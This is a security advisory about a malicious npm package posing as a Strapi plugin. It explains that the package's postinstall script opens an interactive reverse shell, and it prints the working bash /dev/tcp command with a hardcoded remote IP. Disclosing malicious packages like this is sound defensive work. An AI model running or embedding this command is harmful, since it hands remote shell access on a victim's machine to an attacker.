VDB
Sign up

MAL-2026-16180

Malicious code in strapi-plugin-ccresh-meeb (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (5c91c798c5a3429b252f74193e2a84c6406347ced8fa9010bdd7d338af5c8797) The package's postinstall lifecycle script (`scripts.postinstall: node postinstall.js`) unconditionally invokes `/bin/bash` with an interactive reverse-shell payload at install time: `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'`. This connects stdin/stdout/stderr of an interactive bash session to a hardcoded remote host over TCP/443, handing full shell access on the installer's machine to whoever controls that endpoint. A marker file is also written under /tmp confirming execution. The manifest self-labels the package as a `Reverse shell payload for Strapi`. Any `npm install` of this package results in remote code execution and interactive shell access as the installing user.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/strapi-plugin-ccresh-meeb

No fixed version published yet for strapi-plugin-ccresh-meeb (npm). Pin to a known-safe version or switch to an alternative.

References